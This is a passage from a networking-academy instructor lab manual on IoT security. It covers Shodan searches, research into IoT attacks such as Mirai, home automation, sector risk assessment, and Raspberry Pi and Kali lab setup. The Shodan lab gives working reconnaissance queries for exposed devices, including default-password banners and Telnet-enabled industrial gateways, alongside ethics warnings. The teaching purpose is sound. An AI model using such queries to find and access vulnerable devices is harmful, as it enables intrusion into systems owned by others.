IoTF Security v1.1 Instructor Lab Manual

Internet of Things Fundamentals:
IoT Security v1.0

Instructor Lab Manual
This document is exclusive property of Cisco Systems, Inc. Permission is granted

to print and copy this document for non-commercial distribution and exclusive
use by instructors in the Internet of Things Fundamentals curriculum as part of an
official Cisco Networking Academy Program.
Lab – Shodan Search (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Obtain Access to Shodan’s Free Features
Part 2: Investigate Connected IoT Devices
Background / Scenario
Warning: Do not attempt to login to any device you find on the Shodan search engine. Doing so violates your
ethical hacking agreement.
In this lab, you will use the Shodan search engine to gain an understanding of why security should be the
focus of any IoT implementation.
Shodan has servers located around the world that continually crawl the Internet looking for connected
devices. It can find specific devices and device types. This data can then be searched. Some of the more
popular searches include terms such as "webcam", "default passwords", "routers", "video games," and more.
Shodan is a favorite tool used by researchers, security professionals, large enterprises, and computer
emergency response teams (CERTs).
• Researchers can use Shodan to data mine information about what devices are connected, where they
are connected, and what services are exposed.
• Security professionals can use Shodan as part of a penetration testing plan to discover devices that need
to be hardened to prevent potential attacks.
• Large enterprises employ security professionals who should be aware of tools like Shodan for
determining the current risk profile of the enterprise’s connected devices.
• CERTs can use Shodan to quickly generate reports about an emerging attack on connected devices.
Shodan is also a tool used by nefarious individuals and groups commonly referred to as threat actors. Shodan
can accelerate a threat actor’s reconnaissance of Internet connected devices. Like all the tools in this course,
you must use it responsibly according to your organization’s ethical hacking policies.
Instructor Note: Shodan is a powerful website where students can easily get into trouble. For example,
students can find default login information and use it to access the configuration webpage for a device. This
violates ethical hacking agreements.
Required Resources
• Device with Internet access.
• SANS Penetration Testing article, “Getting the Most Out of Shodan Searches”
Part 1: Obtain Access to Shodan’s Free Features

In this part of the lab, you will navigate to the Shodan search engine and sign up for an account.
a. Open a web browser and navigate to the Shodan website at https://www.shodan.io/.
b. Create an account in one of two ways:
 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab - Shodan Search
1) If you click Create a Free Account, you will be directed to a page where you can fill in a form to
create an account on Shodan.
2) If you click Login or Register, you will be directed to a page where you can sign in with one of
several other accounts that you may have, including Google or Facebook.
c. After successfully logging in, you will see your account page, as shown below. Click the Shodan link to
return to the homepage.
Part 2: Investigate Connected IoT Devices

In this part, you will gain familiarity with using Shodan’s features to search for Internet-connected devices.
Step 1: Use the basic features of the Shodan search engine.

From the main page, you can type keywords in the search field to get a list of results.
a. Type cisco as the keyword and press Enter. How many results did you get for your search?
____________________________________________________________________________________
At the time of testing this lab, this search returned over 2 million results.
Note: Not every device that is found by Shodan is insecure. Shodan simply finds devices that are
accessible from the Internet according to a set of search criteria.
b. Look at other information on the left side of the web page. Your search result is broken down into various
categories. Each entry in a category is a clickable link that will refine your search.
How many results, if any, are there for the Windows XP operating system? ________________________
At the time of testing this lab, this search returned 19 results for Windows XP OS.
c. Although Microsoft stopped supporting Windows XP in April 2014, it continues to release patches for it
because there are so many end devices still using the operating system. Use an Internet search to
discover the well-known 2017 cyberattack that targeted older Windows operating systems.
What was the attack called, what did it target, and what did it do?
____________________________________________________________________________________
WannaCry or WannaCrypt ransomware targeted unpatched, older versions of Windows and encrypted
the users’ data and demanded ransom payments in Bitcoin
From your research, you should have noted that this attack targeted unpatched systems. Prior to the
attack, Microsoft had released patches that addressed the vulnerabilities. The systems that were affected
by the attack were ones that had not downloaded and applied the patches. Unpatched software is a
primary attack vector for threat actors. Any connected device is vulnerable to this type of attack. In the IoT
landscape, patching devices becomes even more important as tools such as Shodan can quickly reveal
your device’s information, including potential vulnerabilities, to the world.
Lab - Shodan Search
Note: Not all devices discovered by Shodan are vulnerable. Shodan results consist of Internet-connected
devices and information about those devices. This information may or may not reveal potential
vulnerabilities.
d. On the right side, the main section of your search shows the devices that match your search. Find an
entry that looks interesting to you and fill in the information below.
IP address: ___________________________________________________________________________
Hostname: ___________________________________________________________________________
ISP: ________________________________________________________________________________
Date the entry was added: _______________________________________________________________
Country: _____________________________________________________________________________
e. Your entry will also show some banner information. You may see the beginnings of an SSH banner or an
HTTP banner. Click Details for more information about your entry. You should see several open ports. If
not, try a different entry. List the information you found below.
City and Country: ______________________________________________________________________
Ports open: __________________________________________________________________________
Services running: ______________________________________________________________________
Key types: ___________________________________________________________________________
Answers will vary. Encourage students to look for a variety of open ports including 22 (SSH), 25 (SMTP),
80 (HTTP), 123 (NTP), and 443 (HTTPS). They should be able to find one that lists the encryption keys
for SSH.
f. Return to the Shodan homepage and click Explore. What are some of the Top Voted results?
____________________________________________________________________________________
At the time of testing this lab, Top Voted results included Webcam, Cams, Netcam, default password, and
dreambox.
One of the Top Voted results for you may have been default password. If so, click default password to
see the results. If not, in the search field, type the keywords “default password,” with the quotes, and
press Enter. You will see several results that show default passwords embedded in the banners for
devices. Hopefully, the owners of these devices have changed the default password. However, this
highlights how easy it can be to login to a device if appropriate security measures are not implemented.
Warning: Do not attempt to login to any device you find on the Shodan search engine. Doing so violates
your ethical hacking agreement.
g. In the search field, type the keyword “webcam” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was over 6,000.
h. In the search field, type the keyword “refrigerator” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was 193.
Lab - Shodan Search
Step 2: Use keywords together with search operators to filter your search.
You may have noticed that you can only get two pages of results with your free account access. However,
even with a paid account you would not want to click through the pages that list thousands or millions of
results. Instead, you can combine keywords and search operators to filter your results.
Shodan searches for the services running on a device. It then collects banner information for each service.
For example, here is the banner information for the SNMP service running on a Cisco device found with the
Shodan search:
Cisco Internetwork Operating System Software
IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(23)BC10, RELEASE SOFTWARE
(fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2011 by cisco Systems, Inc.
A search for just "cisco" most likely reveals one to two million results for you. That information may be helpful
to you. However, if you are interested in more specific information, you will want to filter your search using
filter names and values from the banner information.
For example, if you are interested in seeing how many Cisco 7200 routers in the United States are running
the SNMP service, you would enter the following search phrase.
country:US product:"Cisco 7200 Router" port:161
Note: Shodan searches use the two letter (alpha-2) country code based on the International Standards
Organization’s 3166 publication (ISO 3166-1993).
Create your own searches to find the following:
a. Minecraft is a popular video game where players can set up their own servers for others to access online.
Use an Internet search to find the following information.
What is the common port number used by Minecraft servers? ____________ 25565
What is the ISO 3166 alpha-2 code for South Africa? __________ ZA
What Shodan search phrase can you use to discover how many Minecraft servers are currently online in
South Africa?
____________________________________________________________________________________
Minecraft port:"25565" country:"ZA"
How many Minecraft servers are currently online in South Africa? ________________________________
b. Moxa is a supplier of devices that connect industrial equipment to the Internet. How many Moxa devices
are running the Telnet service in Brazil?
Search phrase: _______________________________________________________________________
moxa port:"23" country:"BR"
Total results:
____________________________________________________________________________________
c. Use an Internet search or review Shodan help pages and tutorials to discover how you can filter your
searches based on a range of IP addresses.
d. Mr. Robot is an American drama television series that chronicles the adventures of a cybersecurity
engineer. In the series, the protagonist uses the Shodan search engine to research a fictional corporation.
Use an Internet search to find the search string that was used to discover E Corp’s web server.
Lab - Shodan Search
What string was used?

____________________________________________________________________________________
org:"Evil Corp" product:"Apache Tomcat"
Does the string work on the Shodan search engine? _____________________________ Yes
What IP address was returned by the search? __________________________________ 192.251.68.223
What is the URL for the IP address?
____________________________________________________________________________________
compute.evil-corp-usa.com
e. There are many home devices connected and controlled using IoT. Apply the methods previously used to
search for “garage door” in the state of Michigan in the United States. What was the search string you
used?
____________________________________________________________________________________
country:US state:MI “garage door”
How many results were returned?
____________________________________________________________________________________
16 at the time of this testing
What was the top city listed with the most connected garage doors?
____________________________________________________________________________________
Lansing, with 10 at the time of testing
What are the potential risks of someone having access to this information?
____________________________________________________________________________________
____________________________________________________________________________________
Hackers could take control of the garage door. It could then be opened to allow thefts from the garage or
home.
f. You can check to see if your IP address has any vulnerabilities by using the Internet of Things Scanner at
the following address: https://iotscanner.bullguard.com. Click Check if I am on Shodan to allow the
“Internet of Things Scanner” to scan your IP address. This process may take some time to complete.
Lab - Evaluate Recent IoT Attacks (Instructor Version)
Objectives
Part 1: Research Recent IoT Attacks
Part 2: Describe Mitigation Techniques
As the number of IoT devices continue to grow at an exponential rate, so are the number of attacks on these
devices. There are a wide variety of attacks on IoT devices that have been documented and reported on the
news.
As an IT professional working with IoT devices, it is important to be aware of the wide range of attacks and
vulnerabilities that have occurred on these devices. It is also important to know how to defend against and
minimize the damage from these types of attacks.
Required Resources
 PC or mobile device with Internet access
Part 1: Research Recent IoT Attacks

In this part of the lab, you will research and describe three different types of IoT attacks using the following
steps:
a. Launch your favorite web browser and go to your favorite search engine, such as Google.com.
What key terms will you use to search for recent IoT related security attacks?
____________________________________________________________________________________
____________________________________________________________________________________
b. Go through the results and find the most interesting attacks that have occurred within the last 5 years.
c. Choose three different types of attacks to document in this lab.
d. Describe the attacks in detail. Make sure you answer the following questions:
1) What was the name or type of attack?
2) What was targeted?
3) Who was affected?
4) How did the attack occur? Describe the details of what happened.
5) What is the source of your information? Include the URL.
 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks
Attack #1:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
DDoS attack on DNS provider Dyn.
Cyber attack that knocked out major websites such as Twitter, GitHub, Spotify, and Shopify.
The Mirai botnet targets poorly protected IoT connected devices and uses them to launch a DDoS attack
using specific targets. A Chinese electronics manufacturer admitted that its products inadvertently contributed
to this attack. In this particular attack, the Mirai botnet attacked DVRs and IT cameras made by a Chinese
electronics manufacturer.
http://www.foxnews.com/tech/2016/10/25/ddos-attackers-exploited-insecure-iot-gadgets-from-chinese-
company.amp.html
Attack #2:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Attack #3:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Part 2: Describe Mitigation Techniques

In this part of the lab, you will reflect on how each of these attacks could be mitigated. For example, you might
research and answer the following questions:
 Could this attack have been prevented?
 Can it be defended against?
 What measures need to be implemented in order to mitigate these attacks or minimize the impact?
 What other information about the attack should be described?
Attack #1:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
The attack described in the URL below was a DDoS attack that targeted vulnerable IoT devices. A DDoS
attack can be mitigated by ISPs who try to block malicious traffic. However, if they are not blocked by the ISP,
a targeted company can block the packets from entering their network, but it is likely their bandwidth will be
consumed by the attack. It is also very difficult to block the packets since they are coming from different IP
addresses and it is possible that legitimate traffic could also be blocked. This particular DDoS attack could
have been prevented if IoT manufacturing devices did a better job securing their devices. If machines or
devices couldn’t be infected with botnet viruses, then these types of attacks wouldn’t happen in the first place.
http://www.foxnews.com/tech/2016/10/25/ddos-attackers-exploited-insecure-iot-gadgets-from-chinese-
company.amp.html
Attack #2:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Attack #3:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Lab - Evaluate Home Automation Products (Instructor Version)
Objectives
Part 1: Conduct Research for Home Automation Products
Part 2: Prepare a Presentation
In this lab, you will investigate the wide variety of home automation products. Some products may require
monitoring or maintenance services, so your geographical location will most likely have an impact on your
choices.
Assume you have a budget of $1000 (or equivalent local currency) and the choice of one primary objective for
home automation:
 Increases convenience
 Enhances security
 Saves energy
You will choose an objective and conduct online research to find home automation products to satisfy your
objective. You will then select the desired products keeping the total cost under $1,000 and prepare a
presentation about what you bought, how it achieves your goal, and how the system will be used by the
customer.
Instructor Note: This is an open-ended lab assignment. Answers will vary widely based on what the student
chooses as an objective and the location. The primary purpose of the lab is for students to build an awareness of
the wide variety of offerings available for home automation.
Required Resources
 Presentation preparation software
Part 1: Conduct Research for Home Automation Products

Home automation products represent a large portion of the IoT. Home automation primarily has the following
benefits:
 Increases convenience
 Enhances security
 Saves energy
Complete the following steps to conduct research for home automation products.
a. Launch your favorite web browser and open a search engine such as Google.com.
b. What types of products do you want to search for?
____________________________________________________________________________________
Lab - Evaluate Home Automation Products
c. Record some examples of search terms you used to find products.

____________________________________________________________________________________
d. Record the most useful websites you found from your searches.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
e. Spend time doing some research on the wide variety of products that are offered or reviews on these
products using several websites.
What are your goals for purchasing these products assuming a budget of $1000?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
f. Search for these products at various vendors and companies. What key terms did you use to find these
products?
____________________________________________________________________________________
____________________________________________________________________________________
g. Read through the results and modify your searches as necessary in order to find the best companies with
the best prices selling the products that you decide to purchase.
Make list of your desired products keeping in mind your budget of $1000.00.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
h. Find the best prices looking through at least 2-3 different vendors and companies selling these products.
What companies did you select for researching prices?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
i. Verify that the total that you spent comes does not exceed $1000.00. Make sure that you include taxes
and shipping costs, as necessary.
Part 2: Prepare a Presentation

Prepare a presentation about the products you selected, how it achieves your objective, and how the
customer will use the products.
Lab - Evaluate Home Automation Products
Describe your goals for this project. What was your objective?
Describe the products that you chose for purchase including their complete cost.
How close to $1000 did you spend?
Describe how the products help achieve your goals.
Explain what your new system would look like and how it functions.
Use the following space to draft your notes for presentation preparation.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Lab - Evaluate the IoT Security Risk in an Industry Sector
(Instructor Version)
Objectives
Part 1: Research Risks for an Industry Sector
Part 2: Investigate the Potential Impact of a Security Breach
Part 3: Describe Security Measures for Your Industry Sector
Any implementation of IoT is going to have risk associated with it. Risks could range from fairly insignificant to
very destructive depending on the market, equipment, number of people affected, and numerous other
factors.
In this lab, you will research an industry sector and evaluate the risks associated with implementing an IoT
solution. One of the following industry sectors will be assigned to you.
 agriculture
 automotive
 banking
 construction
 education
 healthcare
 manufacturing
 mining
 retail
 technology industries
 utilities
Instructor Note: This would be a good activity to have students work in groups to brainstorm some ideas and
then present their findings in a quick 5-minute executive summary. Also, it may be worthwhile to initiate a
discussion within the course forum to solicit more dialog.
Required Resources
 Computer with Internet access to be used for research
Part 1: Research Risks for an Industry Sector

In Part 1, you will research your industry sector to determine the risks posed by a security breach. The
questions will guide through some of the things you should look for when determining the severity of an IoT
security breach. There are many other questions that could be asked to determine risk. Try to formulate other
questions that would be important to determine risk.
a. What types of communications services or protocols are used for connecting IoT devices in your industry
sector?
____________________________________________________________________________________
____________________________________________________________________________________
Wired or wireless Ethernet, serial communication, I2C, Bluetooth, cellular, http, https
b. What are some of the known vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
With WiFi weak encryption, http is plain text, Bluetooth can be highjacked, serial communication can be
tapped into, Ethernet in traffic in general can be sniffed and captured.
c. What type of data is being transmitted or stored?
____________________________________________________________________________________
____________________________________________________________________________________
Would altering the data transmitted or stored be damaging? Altered data such as health readings could
have pose a life-threatening situation. Data such as storm information could cause a panic much like what
happened in Hawaii earlier this year.
d. What types of equipment are being monitored or managed?
____________________________________________________________________________________
____________________________________________________________________________________
Depending on the vertical, equipment monitored could be anything from a healthcare device to electrical
grid equipment.
e. What other questions are unique to your industry sector?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Part 2: Investigate the Potential Impact of a Security Breach

In this part, use the information gathered from your research above to answer the following questions:
a. What is the security risk with the data being compromised?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Is the risk life threatening, financial, personal, etc.?
b. Is the security risk life threatening? In what way is safety impacted?

____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Certainly, healthcare device tampering has the potential to be life threatening. Tampering with things like
the electrical grid could have a major impact on many peoples’ lives.
c. Does the security risk pose a financial loss? Describe the financial impact.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Most any security breach has some financial impact. Loss could stem from lost time, damaged equipment
or confidential data.
d. Does the security risk expose personal identity information? What types of information might be exposed?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
If the breach lets the attacker gain internal access it is possible that PII may be compromised. The Target
breach exposed millions of individuals.
Part 3: Describe Security Measures for Your Industry Sector

Based on your research, construct an argument for what security measures are needed in your industry
sector. Discuss your findings with the other groups to see if you can come to a consensus on security
measures that all the industry sectors have in common. What security measures are unique to your industry
sector?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Lab - Set Up PL-App on a Raspberry Pi (Instructor Version)
Lab Topology
Objectives
 Set up a Raspberry Pi board as a The Prototyping Lab Application (PL-App) device
 Use PL-App Launcher to provision and discover PL-App devices
Background
The IoT Security lab topology uses a Raspberry Pi that is connected to a PC. The PC will be used to work
with Python and Jupyter notebooks that are running on the Raspberry Pi. In addition, for some labs, the PC
will run a virtual machine (VM) that interacts with the Pi.
PL-App consists of two components. The first is the PL-App launcher application that runs on the PC. It is
used to provision a PL-App image that is written to a microSD card (µSD) card for the Raspberry Pi. In
addition, PL-App runs on the Raspberry Pi. It contains the Jupyter notebooks software and enables access to
the notebooks and other functions of the Raspberry Pi.
With PL-App, you can access existing IoT Fundamentals labs in the Course Materials folder or write your own
new applications directly on the Raspberry Pi, execute them, and monitor the output from the board with
various visualizations.
Required Resources
 PL-App Launcher application
 PL-App Image file
 Wired Ethernet or Wi-Fi connection to the local-area network with DHCP
 Raspberry Pi with a power adapter
 Google Chrome or other modern web browser
 8GB µSD
Lab - Set Up PL-App on a Raspberry Pi
 USB to µSD card reader
Part 1: Setting up the PL-App
Step 1: Download and Install the PL-App Launcher.

a. Navigate to www.netacad.com in your web browser and access your IoT Security class.
b. From the Student Resources page, download the PL-App Launcher application installer for your operating
system.
c. After a successful download, install the PL-App Launcher application.
Note: Windows 7+ and Mac OS are supported. See the procedure at the alternate step 4 for manually
installing PL-App on a Linux computer from the command line.
d. After a successful installation, start the PL-App Launcher.
Step 2: Download and Install the PL-App Image.

From the Student Resources page, download the PL-App image zip file. Although the PL-App image is a file
with a .zip extension, there is no need to unpack the ZIP file.
Note: The PL-App image file is large and the download speed will vary based on your Internet connection.
Instructor Note: In a classroom with multiple computers, consider distributing the PL-App image file using a
USB memory stick or using a local file server.
Step 3: Set up a micro SD card with PL-App.

a. Start the PL-App Launcher application. You should see the following screen with the Setup a New
Device tab selected:
b. Obtain a µSD card that is at least 8 GB in size.

c. Insert the µSD card into your SD card reader and insert it into your computer.
d. Determine the drive letter of the µSD card using the file explorer.
e. In this example, it is the D: drive.

f. In the PL-App Launcher, select the µSD Card Removable Drive, in this example select the [D:\] drive. If
not present in the menu, click the Refresh button.
Be careful to select the correct drive; if you select the wrong drive, you might destroy your data
on the selected drive.
g. Click the Find Image: Browse button in the application and select the PL-App image zip file that you
downloaded.
Step 4: Configure the Image.

a. To personalize the PL-App installation on the µSD card, enter the configurations section of the PL-App
Launcher application and configure:
o Device Name - This is the name of the PL-App Raspberry Pi instance on your LAN. Make sure the
selected device name is unique on the LAN, otherwise naming problems might occur. For example,
you can use your name followed by a number, or your username, or initials (e.g. myname-myRPi1).
The Device Name can contain letters (a-z), numbers (0-9) and dashes (-). The first character must be
a letter.
o Device Password - This is a password that you will need to enter when accessing PL-App on the
Raspberry Pi. The password is stored in its clear-text form on the µSD card. For security reasons,
always use a unique password (i.e. never use the same password as your email, social media,
netacad.com, etc.).
Instructor Note: PL-App Launcher can also be used to find Raspberry Pis on the network and provide an
easy way to connect to them. However, PL-App Launcher will only list the devices that are running
images that were created on a specific computer. In other words, if a Raspberry Pi is connected to a
computer other than the one on which its PL-App image was created, it will not appear in the list of
Available Devices (see below). It is possible to manually enable PL-App Launcher to find other Raspberry
Pis on the network, however the device name must be known. For this reason, it is important to make
note of the device names provided to the PL-App images.
b. If your Raspberry Pi will be connected to the network over Wi-Fi, enter the optional settings section and
configure the following:
o Wi-Fi SSID - The name of the Wi-Fi network to join (e.g. ClassroomWiFi)
o Wi-Fi Password - The WPA2 Pre-Shared Key
c. When your settings are correct, click the Write Disk Image button to write the PL-App image to the
selected SD card. This will overwrite all data on the card. The process will also write your configuration
settings to the SD card in a file called chestnut.txt. Depending on the speed of your µSD card, this
process might take 5-10 minutes to complete.
Note: If the µSD card has already been flashed with the PL-App image, and you only want to change the
existing settings (e.g. Device Name, Wireless Settings, etc.), then click the Update Config Only button to
update only the setup configuration.
d. When the µSD card setup is complete, use the file explorer to verify the contents of the µSD card. You
should see the µSD card drive name has changed to CISCO-PLAPP.
e. Explore the µSD card drive. You should see the notebooks folder and the chestnut.txt setup file:
o The D:\chestnut.txt file contains the setup information that was created using the PL-App Launcher. If
you need to change any of these settings, you can either use the PL-App Launcher with the Update
Config Only button to update these settings and preserve all the other contents of the SD card, or
edit this file manually.
o The D:\notebooks\Course Materials folder contains all the default notebook files that were bundled
with the release of the PL-App image that was flashed on the µSD card. If you want the most recent,
or unmodified, version of the lab notebooks, download the notebooks zip archive from the course
page and unpack it to the D:\notebooks\Course Materials\coursename folder (the drive letter D: might
be different on your computer). You can also easily backup either your own notebook files, or the
Course Materials, by copying this folder to your computer.
f. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
placing an empty file named ssh in D drive (D:\ssh). When the Raspberry Pi boots, SSH is enabled when
the file is found, and the file ssh is deleted from the file system.
g. Before removing the µSD card from your computer, make sure to safely unmount it by right-clicking the
drive and selecting Eject USB Storage.
h. Remove the µSD card from your computer.
Alternate Step 4 for Advanced Linux users: Setup a µSD card with PL-App
This is a command-line only guide for advanced Linux users. Be very careful. Incorrect use of these tools
might overwrite the data on your primary hard disk. All the existing contents of the µSD card will be
overwritten in this step.
a. Change the current working directory to the location of the PL-App image zip file that you downloaded
previously:
cd Downloads
b. Identify the device name of your µSD card (e.g. sdb):
sudo fdisk –l
c. Check if any of the µSD card partitions are mounted using the mount command and then unmount them.
d. Using dd, transfer the PL-App image to your µSD card (Use caution at this step. Selecting a wrong output
file "of=" parameter can overwrite your own hard disk drive and your own data):
unzip -p -d chestnut.img PL-App-xxxxxx.zip | sudo dd bs=1M of=/dev/{SD card
device name}
e. Wait for dd to complete. It might take 5-10 minutes without showing any output. Be patient.
f. When completed, remove the µSD card USB reader, wait a second, and then plug it back in to mount the
newly created partition on it.
g. In the mounted µSD card partition (with FAT file system and 1 GB in size), create a new text file called
chestnut.txt in the CISCO-PLAPP with the following contents:
Device_Name="{YOUR-NETACAD-USERNAME}-{YOUR-RPi-DEVICE-NAME}"
Device_Password="{YOUR-PL-App-PASSWORD}"
SSID="{YOUR-WIFI-SSID}"
Wifi_Password="{YOUR-WIFI-PASSWORD}"
Example:
Device_Name="myNetAcadUsername-myRPi1"
Device_Password="this is my device password"
SSID="ClassroomWIFI"
Wifi_Password="WPA2password"
h. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
creating an empty file named ssh in CISCO-PLAPP partition. When the Raspberry Pi boots, SSH is
enabled when the file is found, and the file ssh is deleted from the file system.
touch ssh
i. Unmount and remove the µSD card USB reader from your computer.
j. Make sure your Linux computer supports mDNS discovery of hostnames:
sudo apt-get install libnss-mdns
Part 2: Accessing PL-App on a Raspberry Pi on the Network

a. Make sure that the Raspberry Pi is powered off. Insert the µSD card into your Raspberry Pi. The µSD
card slot is on the underside of the board:
b. Before entering or removing the µSD card, always make sure that the Raspberry Pi is powered off.
c. Connect the Raspberry Pi to the LAN. If you are using an Ethernet cable, connect the cable to the
Raspberry Pi. Your computer and the Raspberry Pi must be in the same subnet for the PL-App Launcher
discovery to work.
Note: Some labs require Internet connectivity, so a separate Internet connection is desirable.
Instructor Note: The LAN should provide IP addresses to the Raspberry Pi devices using DHCP. In
addition, the network must not block multicast communication. Auto-configured APIPA addresses may
also be used for labs that do not require a connection to the Internet or other LAN resources.
d. Recommended network topology for a classroom with PL-App:
e. Power on your Raspberry Pi by connecting the micro USB cable with a power supply that provides
enough current to the Raspberry Pi board. The recommended PSU provides 2.5A to power the Raspberry
Pi 3 Model B.
Note: The red Power LED must be on. If the Power LED is blinking, or is off, the power source from the
PSU is not providing enough power to the board.
f. Start the PL-App Launcher application on a PC that is on the same network as the Raspberry Pi. You
should see the following screen with the Available Devices tab:
g. The Available Devices tab lists all the PL-App devices that have been set up on this computer with PL-
App Launcher, or that were manually added to the list using the Add Device Name button.
PL-App Launcher is continuously trying to discover the listed PL-App Raspberry Pi devices even if they
are not connected to the network. When a device is discovered, its current IP address is shown in the list
and the Connect button turns green.
Note: The first startup of a freshly written µSD card might take longer to connect due to the initial setup
process (expanding the file system of the µSD card, etc.).
Instructor Note: PL-App Launcher is using multicast DNS (mDNS, Bonjour) to discover the listed PL-App
Raspberry Pi devices. Without mDNS routing configured, the discovery mechanism only works within the
same one subnet segment. If the network is blocking multicast communication, PL-App Launcher will be
unable to discover connected devices. In that case, try to select the “Use Broadcast mDNS option” in the
PL-App Launcher to fallback from multicast to broadcast packets.
As mentioned above, only PL-App images created on the computer will show up in the list of available
devices. Devices can be added manually, however the device name must be entered to enable this.
h. Click the green Connect button of your device in PL-App Launcher to directly connect to the local PL-App
web interface that is running on your Raspberry Pi. This opens a new web browser window and
establishes a connection to the selected PL-App over HTTP.
i. Log in to the web interface of PL-App. Use the device password you specified in PL-App Launcher in the
setup process of the µSD card.
After a successful login, the PL-App directory browser opens the root directory of the notebooks:
This is the PL-App’s representation of the notebooks folder that was created on the µSD card.
The basic structure of the folders in the root notebooks directory is as follows:
o Course Materials: this folder contains Cisco authored labs in the form of Jupyter Notebooks.
o myfiles: this folder is your space to create your own Jupyter Notebooks and other files.
Appendix: Troubleshooting PL-App

a. Make sure the computer with PL-App meets these criteria:
o On the same subnet as the PL-App Raspberry Pi
o Not connected to VPN
b. If the onboard Red Power LED is anything but solid on (blinking, off, etc.), replace the PSU. The PSU is
unable to provide enough power for the Raspberry Pi.
c. If the onboard green µSD card LED is constantly off or constantly on (more than 30 seconds) perform
these steps:
1) Check that the SD card is correctly inserted in the SD card slot on the underside of the Raspberry Pi
board.
2) Re-flash the µSD card with PL-App Launcher and the PL-App image.
3) Replace the µSD card. It has been found that some SD cards are not compatible with the Raspberry
Pi.
d. Verify the µSD card drive on a computer. Check the chestnut.txt file in the root directory of the µSD card
drive. Verify that the Device_Name specified in chestnut.txt matches the PL-App device name in the PL-
App Launcher Devices tab.
e. If connecting with Wi-Fi, perform these steps:
1) Verify the network name (SSID) and corresponding WPA2 password in chestnut.txt.
2) Connect to the network with an Ethernet cable (connect the computer too).
3) Check if multicast is enabled on the Wi-Fi network.
f. If connecting with an Ethernet cable, perform these steps:
1) Make sure multicast is not blocked or filtered.
2) Make sure DHCP is assigning IP addresses from the same subnet to the Raspberry Pi and the
computer.
g. Try to connect to a different Raspberry Pi board.
Lab – Set Up the IoT Security Lab Topology (Instructor Version)
Topology
Objectives
Part 1: Setup the Lab Environment
Part 2: Import the IoT Security Virtual Machines
Computing power and resources have increased tremendously over the last 10 years. A benefit of having
multicore processors and large amounts of RAM is the ability to use virtualization. With virtualization, one or
more virtual computers operate inside one physical computer. Virtual computers that run within physical
computers are called virtual machines (VMs). VMs are often called guests, and physical computers are often
called hosts. Anyone with a modern computer and operating system can run VMs.
In this lab, you will set up and explore the lab environment that will be used in this course. A VM is used for
many of the labs in this course. The VM is created with Oracle VirtualBox and an Oracle virtual appliance
(OVA) file. The OVA file contains a special version of Linux called Kali. Kali is a very popular Linux distribution
that contains many tools that are used for assessing network security. VirtualBox allows you to run this
version of Linux on a Mac or PC as a VM. You can use this VM to interact with other hosts on the lab network.
Note: Only use Kali tools on networks on which you are authorized to do so. Abuse of the Kali tools will be a
violation of your ethical hacking agreement.
Lab – Set Up the IoT Security Lab Topology
Required Resources
 Host computer with at least 4 GB of RAM and 15 GB of free disk space
 Oracle VirtualBox
 IoT Security Kali Linux OVA and Metasploitable OVA files
 Internet connection
 An Ethernet patch cable
Part 1: Setup the Lab Environment

Follow the directions of your instructor to build a lab topology similar to the one shown in the Topology section
of this lab. Your topology may differ slightly. For example, several PCs and Raspberry Pi devices may be
connected to the same switch. What is important is that you can identify your own target Raspberry Pi using
